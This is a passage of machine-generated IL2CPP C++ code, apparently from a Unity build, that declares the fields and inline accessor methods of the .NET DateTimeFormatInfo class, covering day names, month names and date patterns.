Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * ___calendar_17; // System.Int32 System.Globalization.DateTimeFormatInfo::firstDayOfWeek int32_t ___firstDayOfWeek_18; // System.Int32 System.Globalization.DateTimeFormatInfo::calendarWeekRule int32_t ___calendarWeekRule_19; // System.String System.Globalization.DateTimeFormatInfo::fullDateTimePattern String_t* ___fullDateTimePattern_20; // System.String[] System.Globalization.DateTimeFormatInfo::abbreviatedDayNames StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* ___abbreviatedDayNames_21; // System.String[] System.Globalization.DateTimeFormatInfo::m_superShortDayNames StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* ___m_superShortDayNames_22; // System.String[] System.Globalization.DateTimeFormatInfo::dayNames StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* ___dayNames_23; // System.String[] System.Globalization.DateTimeFormatInfo::abbreviatedMonthNames StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* ___abbreviatedMonthNames_24; // System.String[] System.Globalization.DateTimeFormatInfo::monthNames StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* ___monthNames_25; // System.String[] System.Globalization.DateTimeFormatInfo::genitiveMonthNames StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* ___genitiveMonthNames_26; // System.String[] System.Globalization.DateTimeFormatInfo::m_genitiveAbbreviatedMonthNames StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* ___m_genitiveAbbreviatedMonthNames_27; // System.String[] System.Globalization.DateTimeFormatInfo::leapYearMonthNames StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* ___leapYearMonthNames_28; // System.String System.Globalization.DateTimeFormatInfo::longDatePattern String_t* ___longDatePattern_29; // System.String System.Globalization.DateTimeFormatInfo::shortDatePattern String_t* ___shortDatePattern_30; // System.String System.Globalization.DateTimeFormatInfo::yearMonthPattern String_t* ___yearMonthPattern_31; // System.String System.Globalization.DateTimeFormatInfo::longTimePattern String_t* ___longTimePattern_32; // System.String System.Globalization.DateTimeFormatInfo::shortTimePattern String_t* ___shortTimePattern_33; // System.String[] System.Globalization.DateTimeFormatInfo::allYearMonthPatterns StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* ___allYearMonthPatterns_34; // System.String[] System.Globalization.DateTimeFormatInfo::allShortDatePatterns StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* ___allShortDatePatterns_35; // System.String[] System.Globalization.DateTimeFormatInfo::allLongDatePatterns StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* ___allLongDatePatterns_36; // System.String[] System.Globalization.DateTimeFormatInfo::allShortTimePatterns StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* ___allShortTimePatterns_37; // System.String[] System.Globalization.DateTimeFormatInfo::allLongTimePatterns StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* ___allLongTimePatterns_38; // System.String[] System.Globalization.DateTimeFormatInfo::m_eraNames StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* ___m_eraNames_39; // System.String[] System.Globalization.DateTimeFormatInfo::m_abbrevEraNames StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* ___m_abbrevEraNames_40; // System.String[] System.Globalization.DateTimeFormatInfo::m_abbrevEnglishEraNames StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* ___m_abbrevEnglishEraNames_41; // System.Int32[] System.Globalization.DateTimeFormatInfo::optionalCalendars Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* ___optionalCalendars_42; // System.Boolean System.Globalization.DateTimeFormatInfo::m_isReadOnly bool ___m_isReadOnly_44; // System.Globalization.DateTimeFormatFlags System.Globalization.DateTimeFormatInfo::formatFlags int32_t ___formatFlags_45; // System.Int32 System.Globalization.DateTimeFormatInfo::CultureID int32_t ___CultureID_47; // System.Boolean System.Globalization.DateTimeFormatInfo::m_useUserOverride bool ___m_useUserOverride_48; // System.Boolean System.Globalization.DateTimeFormatInfo::bUseCalendarInfo bool ___bUseCalendarInfo_49; // System.Int32 System.Globalization.DateTimeFormatInfo::nDataItem int32_t ___nDataItem_50; // System.Boolean System.Globalization.DateTimeFormatInfo::m_isDefaultCalendar bool ___m_isDefaultCalendar_51; // System.String[] System.Globalization.DateTimeFormatInfo::m_dateWords StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* ___m_dateWords_53; // System.String System.Globalization.DateTimeFormatInfo::m_fullTimeSpanPositivePattern String_t* ___m_fullTimeSpanPositivePattern_54; // System.String System.Globalization.DateTimeFormatInfo::m_fullTimeSpanNegativePattern String_t* ___m_fullTimeSpanNegativePattern_55; // System.Globalization.TokenHashValue[] System.Globalization.DateTimeFormatInfo::m_dtfiTokenHash TokenHashValueU5BU5D_t5C8B41D89122FC1D3ED53C946C2656DA03CE899A* ___m_dtfiTokenHash_57; public: inline static int32_t get_offset_of_m_cultureData_1() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___m_cultureData_1)); } inline CultureData_tF43B080FFA6EB278F4F289BCDA3FB74B6C208ECD * get_m_cultureData_1() const { return ___m_cultureData_1; } inline CultureData_tF43B080FFA6EB278F4F289BCDA3FB74B6C208ECD ** get_address_of_m_cultureData_1() { return &___m_cultureData_1; } inline void set_m_cultureData_1(CultureData_tF43B080FFA6EB278F4F289BCDA3FB74B6C208ECD * value) { ___m_cultureData_1 = value; Il2CppCodeGenWriteBarrier((&___m_cultureData_1), value); } inline static int32_t get_offset_of_m_name_2() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___m_name_2)); } inline String_t* get_m_name_2() const { return ___m_name_2; } inline String_t** get_address_of_m_name_2() { return &___m_name_2; } inline void set_m_name_2(String_t* value) { ___m_name_2 = value; Il2CppCodeGenWriteBarrier((&___m_name_2), value); } inline static int32_t get_offset_of_m_langName_3() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___m_langName_3)); } inline String_t* get_m_langName_3() const { return ___m_langName_3; } inline String_t** get_address_of_m_langName_3() { return &___m_langName_3; } inline void set_m_langName_3(String_t* value) { ___m_langName_3 = value; Il2CppCodeGenWriteBarrier((&___m_langName_3), value); } inline static int32_t get_offset_of_m_compareInfo_4() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___m_compareInfo_4)); } inline CompareInfo_tB9A071DBC11AC00AF2EA2066D0C2AE1DCB1865D1 * get_m_compareInfo_4() const { return ___m_compareInfo_4; } inline CompareInfo_tB9A071DBC11AC00AF2EA2066D0C2AE1DCB1865D1 ** get_address_of_m_compareInfo_4() { return &___m_compareInfo_4; } inline void set_m_compareInfo_4(CompareInfo_tB9A071DBC11AC00AF2EA2066D0C2AE1DCB1865D1 * value) { ___m_compareInfo_4 = value; Il2CppCodeGenWriteBarrier((&___m_compareInfo_4), value); } inline static int32_t get_offset_of_m_cultureInfo_5() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___m_cultureInfo_5)); } inline CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F * get_m_cultureInfo_5() const { return ___m_cultureInfo_5; } inline CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F ** get_address_of_m_cultureInfo_5() { return &___m_cultureInfo_5; } inline void set_m_cultureInfo_5(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F * value) { ___m_cultureInfo_5 = value; Il2CppCodeGenWriteBarrier((&___m_cultureInfo_5), value); } inline static int32_t get_offset_of_amDesignator_6() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___amDesignator_6)); } inline String_t* get_amDesignator_6() const { return ___amDesignator_6; } inline String_t** get_address_of_amDesignator_6() { return &___amDesignator_6; } inline void set_amDesignator_6(String_t* value) { ___amDesignator_6 = value; Il2CppCodeGenWriteBarrier((&___amDesignator_6), value); } inline static int32_t get_offset_of_pmDesignator_7() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___pmDesignator_7)); } inline String_t* get_pmDesignator_7() const { return ___pmDesignator_7; } inline String_t** get_address_of_pmDesignator_7() { return &___pmDesignator_7; } inline void set_pmDesignator_7(String_t* value) { ___pmDesignator_7 = value; Il2CppCodeGenWriteBarrier((&___pmDesignator_7), value); } inline static int32_t get_offset_of_dateSeparator_8() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___dateSeparator_8)); } inline String_t* get_dateSeparator_8() const { return ___dateSeparator_8; } inline String_t** get_address_of_dateSeparator_8() { return &___dateSeparator_8; } inline void set_dateSeparator_8(String_t* value) { ___dateSeparator_8 = value; Il2CppCodeGenWriteBarrier((&___dateSeparator_8), value); } inline static int32_t get_offset_of_generalShortTimePattern_9() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___generalShortTimePattern_9)); } inline String_t* get_generalShortTimePattern_9() const { return ___generalShortTimePattern_9; } inline String_t** get_address_of_generalShortTimePattern_9() { return &___generalShortTimePattern_9; } inline void set_generalShortTimePattern_9(String_t* value) { ___generalShortTimePattern_9 = value; Il2CppCodeGenWriteBarrier((&___generalShortTimePattern_9), value); } inline static int32_t get_offset_of_generalLongTimePattern_10() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___generalLongTimePattern_10)); } inline String_t* get_generalLongTimePattern_10() const { return ___generalLongTimePattern_10; } inline String_t** get_address_of_generalLongTimePattern_10() { return &___generalLongTimePattern_10; } inline void set_generalLongTimePattern_10(String_t* value) { ___generalLongTimePattern_10 = value; Il2CppCodeGenWriteBarrier((&___generalLongTimePattern_10), value); } inline static int32_t get_offset_of_timeSeparator_11() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___timeSeparator_11)); } inline String_t* get_timeSeparator_11() const { return ___timeSeparator_11; } inline String_t** get_address_of_timeSeparator_11() { return &___timeSeparator_11; } inline void set_timeSeparator_11(String_t* value) { ___timeSeparator_11 = value; Il2CppCodeGenWriteBarrier((&___timeSeparator_11), value); } inline static int32_t get_offset_of_monthDayPattern_12() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___monthDayPattern_12)); } inline String_t* get_monthDayPattern_12() const { return ___monthDayPattern_12; } inline String_t** get_address_of_monthDayPattern_12() { return &___monthDayPattern_12; } inline void set_monthDayPattern_12(String_t* value) { ___monthDayPattern_12 = value; Il2CppCodeGenWriteBarrier((&___monthDayPattern_12), value); } inline static int32_t get_offset_of_dateTimeOffsetPattern_13() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___dateTimeOffsetPattern_13)); } inline String_t* get_dateTimeOffsetPattern_13() const { return ___dateTimeOffsetPattern_13; } inline String_t** get_address_of_dateTimeOffsetPattern_13() { return &___dateTimeOffsetPattern_13; } inline void set_dateTimeOffsetPattern_13(String_t* value) { ___dateTimeOffsetPattern_13 = value; Il2CppCodeGenWriteBarrier((&___dateTimeOffsetPattern_13), value); } inline static int32_t get_offset_of_calendar_17() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___calendar_17)); } inline Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * get_calendar_17() const { return ___calendar_17; } inline Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 ** get_address_of_calendar_17() { return &___calendar_17; } inline void set_calendar_17(Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * value) { ___calendar_17 = value; Il2CppCodeGenWriteBarrier((&___calendar_17), value); } inline static int32_t get_offset_of_firstDayOfWeek_18() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___firstDayOfWeek_18)); } inline int32_t get_firstDayOfWeek_18() const { return ___firstDayOfWeek_18; } inline int32_t* get_address_of_firstDayOfWeek_18() { return &___firstDayOfWeek_18; } inline void set_firstDayOfWeek_18(int32_t value) { ___firstDayOfWeek_18 = value; } inline static int32_t get_offset_of_calendarWeekRule_19() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___calendarWeekRule_19)); } inline int32_t get_calendarWeekRule_19() const { return ___calendarWeekRule_19; } inline int32_t* get_address_of_calendarWeekRule_19() { return &___calendarWeekRule_19; } inline void set_calendarWeekRule_19(int32_t value) { ___calendarWeekRule_19 = value; } inline static int32_t get_offset_of_fullDateTimePattern_20() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___fullDateTimePattern_20)); } inline String_t* get_fullDateTimePattern_20() const { return ___fullDateTimePattern_20; } inline String_t** get_address_of_fullDateTimePattern_20() { return &___fullDateTimePattern_20; } inline void set_fullDateTimePattern_20(String_t* value) { ___fullDateTimePattern_20 = value; Il2CppCodeGenWriteBarrier((&___fullDateTimePattern_20), value); } inline static int32_t get_offset_of_abbreviatedDayNames_21() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___abbreviatedDayNames_21)); } inline StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* get_abbreviatedDayNames_21() const { return ___abbreviatedDayNames_21; } inline StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E** get_address_of_abbreviatedDayNames_21() { return &___abbreviatedDayNames_21; } inline void set_abbreviatedDayNames_21(StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* value) { ___abbreviatedDayNames_21 = value; Il2CppCodeGenWriteBarrier((&___abbreviatedDayNames_21), value); } inline static int32_t get_offset_of_m_superShortDayNames_22() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___m_superShortDayNames_22)); } inline StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* get_m_superShortDayNames_22() const { return ___m_superShortDayNames_22; } inline StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E** get_address_of_m_superShortDayNames_22() { return &___m_superShortDayNames_22; } inline void set_m_superShortDayNames_22(StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* value) { ___m_superShortDayNames_22 = value; Il2CppCodeGenWriteBarrier((&___m_superShortDayNames_22), value); } inline static int32_t get_offset_of_dayNames_23() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___dayNames_23)); } inline StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* get_dayNames_23() const { return ___dayNames_23; } inline StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E** get_address_of_dayNames_23() { return &___dayNames_23; } inline void set_dayNames_23(StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* value) { ___dayNames_23 = value; Il2CppCodeGenWriteBarrier((&___dayNames_23), value); } inline static int32_t get_offset_of_abbreviatedMonthNames_24() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___abbreviatedMonthNames_24)); } inline StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* get_abbreviatedMonthNames_24() const { return ___abbreviatedMonthNames_24; } inline StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E** get_address_of_abbreviatedMonthNames_24() { return &___abbreviatedMonthNames_24; } inline void set_abbreviatedMonthNames_24(StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* value) { ___abbreviatedMonthNames_24 = value; Il2CppCodeGenWriteBarrier((&___abbreviatedMonthNames_24), value); } inline static int32_t get_offset_of_monthNames_25() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___monthNames_25)); } inline StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* get_monthNames_25() const { return ___monthNames_25; } inline StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E** get_address_of_monthNames_25() { return &___monthNames_25; } inline void set_monthNames_25(StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* value) { ___monthNames_25 = value; Il2CppCodeGenWriteBarrier((&___monthNames_25), value); } inline static int32_t get_offset_of_genitiveMonthNames_26() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___genitiveMonthNames_26)); } inline StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* get_genitiveMonthNames_26() const { return ___genitiveMonthNames_26; } inline StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E** get_address_of_genitiveMonthNames_26() { return &___genitiveMonthNames_26; } inline void set_genitiveMonthNames_26(StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* value) { ___genitiveMonthNames_26 = value; Il2CppCodeGenWriteBarrier((&___genitiveMonthNames_26), value); } inline static int32_t get_offset_of_m_genitiveAbbreviatedMonthNames_27() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___m_genitiveAbbreviatedMonthNames_27)); } inline StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* get_m_genitiveAbbreviatedMonthNames_27() const { return ___m_genitiveAbbreviatedMonthNames_27; } inline StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E** get_address_of_m_genitiveAbbreviatedMonthNames_27() { return &___m_genitiveAbbreviatedMonthNames_27; } inline void set_m_genitiveAbbreviatedMonthNames_27(StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* value) { ___m_genitiveAbbreviatedMonthNames_27 = value; Il2CppCodeGenWriteBarrier((&___m_genitiveAbbreviatedMonthNames_27), value); } inline static int32_t get_offset_of_leapYearMonthNames_28() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___leapYearMonthNames_28)); } inline StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* get_leapYearMonthNames_28() const { return ___leapYearMonthNames_28; } inline StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E** get_address_of_leapYearMonthNames_28() { return &___leapYearMonthNames_28; } inline void set_leapYearMonthNames_28(StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* value) { ___leapYearMonthNames_28 = value; Il2CppCodeGenWriteBarrier((&___leapYearMonthNames_28), value); } inline static int32_t get_offset_of_longDatePattern_29() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___longDatePattern_29)); } inline String_t* get_longDatePattern_29() const { return ___longDatePattern_29; } inline String_t** get_address_of_longDatePattern_29() { return &___longDatePattern_29; } inline void set_longDatePattern_29(String_t* value) { ___longDatePattern_29 = value; Il2CppCodeGenWriteBarrier((&___longDatePattern_29), value); } inline static int32_t get_offset_of_shortDatePattern_30() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___shortDatePattern_30)); } inline String_t* get_shortDatePattern_30() const { return ___shortDatePattern_30; } inline String_t** get_address_of_shortDatePattern_30() { return &___shortDatePattern_30; } inline void set_shortDatePattern_30(String_t* value) { ___shortDatePattern_30 = value; Il2CppCodeGenWriteBarrier((&___shortDatePattern_30), value); } inline static int32_t get_offset_of_yearMonthPattern_31() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___yearMonthPattern_31)); } inline String_t* get_yearMonthPattern_31() const { return ___yearMonthPattern_31; } inline String_t** get_address_of_yearMonthPattern_31() { return &___yearMonthPattern_31; } inline void set_yearMonthPattern_31(String_t* value) { ___yearMonthPattern_31 = value; Il2CppCodeGenWriteBarrier((&___yearMonthPattern_31), value); } inline static int32_t get_offset_of_longTimePattern_32() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___longTimePattern_32)); } inline String_t* get_longTimePattern_32() const { return ___longTimePattern_32; } inline String_t** get_address_of_longTimePattern_32() { return &___longTimePattern_32; } inline void set_longTimePattern_32(String_t* value) { ___longTimePattern_32 = value; Il2CppCodeGenWriteBarrier((&___longTimePattern_32), value); } inline static int32_t get_offset_of_shortTimePattern_33() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___shortTimePattern_33)); } inline String_t* get_shortTimePattern_33() const { return ___shortTimePattern_33; } inline String_t** get_address_of_shortTimePattern_33() { return &___shortTimePattern_33; } inline void set_shortTimePattern_33(String_t* value) { ___shortTimePattern_33 = value; Il2CppCodeGenWriteBarrier((&___shortTimePattern_33), value); } inline static int32_t get_offset_of_allYearMonthPatterns_34() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___allYearMonthPatterns_34)); } inline StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* get_allYearMonthPatterns_34() const { return ___allYearMonthPatterns_34; } inline StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E** get_address_of_allYearMonthPatterns_34() { return &___allYearMonthPatterns_34; } inline void set_allYearMonthPatterns_34(StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* value) { ___allYearMonthPatterns_34 = value; Il2CppCodeGenWriteBarrier((&___allYearMonthPatterns_34), value); } inline static int32_t get_offset_of_allShortDatePatterns_35() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___allShortDatePatterns_35)); } inline StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* get_allShortDatePatterns_35() const { return ___allShortDatePatterns_35; } inline StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E** get_address_of_allShortDatePatterns_35() { return &___allShortDatePatterns_35; } inline void set_allShortDatePatterns_35(StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* value) { ___allShortDatePatterns_35 = value; Il2CppCodeGenWriteBarrier((&___allShortDatePatterns_35), value); } inline static int32_t get_offset_of_allLongDatePatterns_36() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___allLongDatePatterns_36)); } inline StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* get_allLongDatePatterns_36() const { return ___allLongDatePatterns_36; } inline StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E** get_address_of_allLongDatePatterns_36() { return &___allLongDatePatterns_36; } inline void set_allLongDatePatterns_36(StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* value) { ___allLongDatePatterns_36 = value; Il2CppCodeGenWriteBarrier((&___allLongDatePatterns_36), value); } inline static int32_t get_offset_of_allShortTimePatterns_37() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___allShortTimePatterns_37)); } inline StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* get_allShortTimePatterns_37() const { return ___allShortTimePatterns_37; } inline StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E** get_address_of_allShortTimePatterns_37() { return &___allShortTimePatterns_37; } inline void set_allShortTimePatterns_37(StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* value) { ___allShortTimePatterns_37 = value; Il2CppCodeGenWriteBarrier((&___allShortTimePatterns_37), value); } inline static int32_t get_offset_of_allLongTimePatterns_38() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___allLongTimePatterns_38)); } inline StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* get_allLongTimePatterns_38() const { return ___allLongTimePatterns_38; } inline StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E** get_address_of_allLongTimePatterns_38() { return &___allLongTimePatterns_38; } inline void set_allLongTimePatterns_38(StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* value) { ___allLongTimePatterns_38 = value; Il2CppCodeGenWriteBarrier((&___allLongTimePatterns_38), value); } inline static int32_t get_offset_of_m_eraNames_39() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___m_eraNames_39)); } inline StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* get_m_eraNames_39() const { return ___m_eraNames_39; } inline StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E** get_address_of_m_eraNames_39() { return &___m_eraNames_39; } inline void set_m_eraNames_39(StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* value) { ___m_eraNames_39 = value; Il2CppCodeGenWriteBarrier((&___m_eraNames_39), value); } inline static int32_t get_offset_of_m_abbrevEraNames_40() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___m_abbrevEraNames_40)); } inline StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* get_m_abbrevEraNames_40() const { return ___m_abbrevEraNames_40; } inline StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E** get_address_of_m_abbrevEraNames_40() { return &___m_abbrevEraNames_40; } inline void set_m_abbrevEraNames_40(StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* value) { ___m_abbrevEraNames_40 = value; Il2CppCodeGenWriteBarrier((&___m_abbrevEraNames_40), value); } inline static int32_t get_offset_of_m_abbrevEnglishEraNames_41() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___m_abbrevEnglishEraNames_41)); } inline StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* get_m_abbrevEnglishEraNames_41() const { return ___m_abbrevEnglishEraNames_41; } inline StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E** get_address_of_m_abbrevEnglishEraNames_41() { return &___m_abbrevEnglishEraNames_41; } inline void set_m_abbrevEnglishEraNames_41(StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* value) { ___m_abbrevEnglishEraNames_41 = value; Il2CppCodeGenWriteBarrier((&___m_abbrevEnglishEraNames_41), value); } inline static int32_t get_offset_of_optionalCalendars_42() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___optionalCalendars_42)); } inline Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* get_optionalCalendars_42() const { return ___optionalCalendars_42; } inline Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83** get_address_of_optionalCalendars_42() { return &___optionalCalendars_42; } inline void set_optionalCalendars_42(Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* value) { ___optionalCalendars_42 = value; Il2CppCodeGenWriteBarrier((&___optionalCalendars_42), value); } inline static int32_t get_offset_of_m_isReadOnly_44() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___m_isReadOnly_44)); } inline bool get_m_isReadOnly_44() const { return ___m_isReadOnly_44; } inline bool* get_address_of_m_isReadOnly_44() { return &___m_isReadOnly_44; } inline void set_m_isReadOnly_44(bool value) { ___m_isReadOnly_44 = value; } inline static int32_t get_offset_of_formatFlags_45() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___formatFlags_45)); } inline int32_t get_formatFlags_45() const { return ___formatFlags_45; } inline int32_t* get_address_of_formatFlags_45() { return &___formatFlags_45; } inline void set_formatFlags_45(int32_t value) { ___formatFlags_45 = value; } inline static int32_t get_offset_of_CultureID_47() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___CultureID_47)); } inline int32_t get_CultureID_47() const { return ___CultureID_47; } inline int32_t* get_address_of_CultureID_47() { return &___CultureID_47; } inline void set_CultureID_47(int32_t value) { ___CultureID_47 = value; } inline static int32_t get_offset_of_m_useUserOverride_48() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___m_useUserOverride_48)); } inline bool get_m_useUserOverride_48() const { return ___m_useUserOverride_48; } inline bool* get_address_of_m_useUserOverride_48() { return &___m_useUserOverride_48; } inline void set_m_useUserOverride_48(bool value) { ___m_useUserOverride_48 = value; } inline static int32_t get_offset_of_bUseCalendarInfo_49() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, 